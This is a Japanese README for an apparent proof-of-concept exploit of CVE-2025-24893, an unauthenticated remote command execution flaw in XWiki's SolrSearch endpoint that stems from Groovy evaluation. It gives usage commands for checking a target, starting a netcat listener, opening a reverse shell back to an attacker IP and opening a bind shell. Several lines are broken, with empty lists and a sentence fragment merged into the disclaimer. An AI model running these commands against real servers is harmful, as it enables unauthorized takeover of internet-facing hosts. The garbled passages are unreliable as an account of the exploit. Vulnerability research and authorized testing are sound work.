
CVE-2025-24893の概念実証 – XWikiにおける安全でないサーバーサイドテンプレート評価による認証不要のリモートコマンド実行を示す。
このリポジトリには、XWiki に影響を与える 認証不要のリモートコマンド実行 (RCE) 脆弱性 CVE-2025-24893 の 管理された概念実証 (PoC) が含まれています。
この脆弱性により、安全でないサーバーサイドのテンプレートおよびスクリプト評価により、攻撃者がサーバー上で任意のオペレーティングシステムコマンドを実行できるようになります。
XWikiは、一般的に以下の用途で使用されるオープンソースのエンタープライズウィキプラットフォームです:
XWikiはインターネットに公開されたサーバーに頻繁にデプロイされるため、そのリクエスト処理とスクリプトロジックのセキュリティ脆弱性は実際の影響が大きくなる可能性があります。
SolrSearchエンドポイントに渡されたユーザー制御の入力が、Groovyスクリプトエンジンによって不適切に検証・評価されました。これにより、攻撃者が提供した入力が実行可能なサーバーサイドコードとして解釈され、ホストシステム上でのコマンド実行が可能となりました。
このPoCは以下を実証します:
python3 xwiki_cve_2025_24893.py http://target:8080 -m check
nc -lvnp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m reverse -lh <attacker_ip> -lp 4444
python3 xwiki_cve_2025_24893.py http://target:8080 -m bind -lp 4444
SolrSearchエンドポイントに送信されるこのプロジェクトは教育目的および許可されたセキュリティテストのためのみ提供されています。
明示的な許可なくシステムに対してこのコードを不正に使用することは禁止されています。
このリポジトリは以下を示すために作成されました: